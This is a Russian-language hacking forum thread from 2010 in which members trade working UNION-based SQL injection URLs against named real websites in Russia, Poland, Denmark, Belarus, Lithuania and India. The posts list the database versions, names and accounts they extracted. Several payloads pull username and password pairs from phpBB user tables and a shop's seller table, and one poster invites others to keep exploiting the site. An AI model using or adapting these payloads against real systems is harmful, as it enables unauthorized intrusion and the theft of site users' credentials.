 |
|
03.08.2010, 15:58
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами:
8854580
Репутация:
34
|
|
Код:
http://www.parfyme.ru/index.php?id=158+and+1=0+union+select+unhex(hex(version()))--
PR: N/A ТИЦ: 0
Database Version: 5.0.89-Max-log
Database name: srv13147_sql1
User name: srv13147_diman@c11-w.ht-systems.ru
OC type: unknown-linux-gnu
Код:
http://www.parkiet.bialystok.pl/page_edit_product.php?ID=64&kategoriaID=1&podkategoriaId=1509+and+1=0+union+select+version(),2,3,4,5,6,7,8,9,10--
PR: 2 ТИЦ: 0
Database Version: 5.0.90-log
Database name: baza14270
User name: admin14270@85.128.140.40
OC type: unknown-linux-gnu
Код:
http://yaroslavl.ecologyandculture.ru/index.php?id=5+and+1=0+union+select+version()--
PR: 5 ТИЦ: 40
Database Version: 5.0.26-log
Database name: ecologyand_voron
User name: ecologyand_voron@localhost
OC type: pc-linux-gnu
Код:
http://raportowanie.pl/mainen/main.php?id=5009+and+1=0+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14--
PR: 3 ТИЦ: 0
Database Version: 5.0.32-Debian_7etch12-log
Database name: mineralmidrange
User name: mineralmidrange@www-1.srv.noria.pl
OC type: pc-linux-gnu
Код:
http://www.nagazetnom.ru/index.php?id=20+and+1=0+union+select+version()--
PR: N/A ТИЦ: 50
Database Version: 5.0.24-standard
Database name: db_nagazetnom1
User name: nagazetnom1@localhost |
|
|
03.08.2010, 17:58
|
|
Moderator - Level 7
Регистрация: 10.03.2009
Сообщений: 1,013
С нами:
9038208
Репутация:
1521
|
|
Тиц 10
pr 3
http://housefan.de/videos.php?acc=Housefan.de&vid=1+union+select+1,2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19&vkey=0 9f950750fd565dadeeeb&action=showvid
5.0.32-Debian_7etch12-log:housefan:housefan@localhostc-linux-gnu
|
|
|
|
03.08.2010, 18:07
|
|
Iron Man#2
Регистрация: 08.07.2009
Сообщений: 2,084
С нами:
8865026
Репутация:
2562
|
|
http://www.aeheralds.net/rolls/Groups.php?id=-1+UnIon+selECt+1,2,3,concat_ws(0x3a,user(),%20@@ve rsion_compile_os,version()),5,6,7,8,9,10--
Crown Principality of aeherald_aeheral@localhostc-linux-gnu:5.0.91-community
Сообщение от None
http://www.chinesecj.com/faq/faq.php?id=-2+UnIon+selECt+1,concat_ws(0x3a,user(),database(), version()),3,4+--+
Сообщение от None
chinesec_cjuser@localhost:chinesec_cj:5.0.91-community
pr5 |
|
|
|
03.08.2010, 21:42
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
http://rekguitars.com/english.php?site=dir&nr=-2+union+select+1,@@version_comment,@@datadir,@@tmp dir,@@version,user(),database(),@@version_compile_ os,@@version_compile_machine,@@warning_count,@@sys tem_time_zone,@@query_cache_size,13,14,15,16,17,18
|
|
|
|
04.08.2010, 17:55
|
|
Новичок
Регистрация: 21.10.2009
Сообщений: 27
С нами:
8713408
Репутация:
16
|
|
Код:
http://www.submission-ragecage.dk/news/news.display.php?id=38-999.9+union+select+1,2,3,4,5,6,7--
Код:
http://www.submission-ragecage.dk/news/news.display.php?id=38-999.9+union+select+1,2,3,4,concat(username,char(58),user_password),6,7+from+phpbb_users--
PR: 3
ТИЦ: 10 |
|
|
|
04.08.2010, 17:57
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
http://www.mundocapoeira.ru/index.php?area=news&id=-176+union+select+1,2,concat(version(),0x3a,databas e(),0x3a,user()),4--+
5.0.32-Debian_7etch12-log:capoeira_site:capoeira@localhost
|
|
|
|
04.08.2010, 17:59
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
http://www.kupitam.by/catalog.php?id=173+and+1=0+union+select+1,2,3,4,5, 6,7,8,concat(username,char(58),user_password),10,1 1,12,13,14,15,16,17,18,19,20+from+phpbbnew_users--
|
|
|
|
04.08.2010, 19:20
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
ПР 5
ТИЦ 750
Код:
http://www.tatarstan.net/index.phtml?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6+--
tatarstan@localhost:tatarstan:5.0.90
|
|
|
|
04.08.2010, 19:53
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
expressindia.com
PR - 8
уязвимость на уже не существующем проекте community.expressindia.com:
Код:
http://community.expressindia.com/myindia/message_popup.php?postId=-42612+union+select+null,null,name||chr(58)||password||chr(58)||email+from+mboard_user+limit+1+offset+0--+
некоторое пароли подходят и для главной странички ;-)
sql inj присутствует также в интернет-магазине, хостящемся на expressindia.com:
доступа к pg_shadow нет, но кое-что полезное можно извлечь... к примеру пароли продавцов магазина (формате base64, как я понимаю)
Код:
http://shopping.expressindia.com/index.php?page=listing&catId=-650+union+select+null,name||chr(58)||password||chr(58)||email,null,null,null,null,null,null+from+seller--+
db - PostgreSQL
вообще на сайте, как мне показалось, есть еще не мало дырок... если кто-нибудь захочет докрутить - u r welcome
|
|
|
|
04.08.2010, 20:30
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
http://www.ratlankiai.lt/product.php?&lng=lt&pid=-724+union+select+1,2,3,4
---
магазин
http://www.dinitrol.lt/straipsnis.php?id=10+union+select+1,2,aes_decrypt( aes_encrypt(concat_ws(0x3a,version(),@@version_com pile_os,@@version_compile_machine,@@version_commen t),1),1),4,5
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
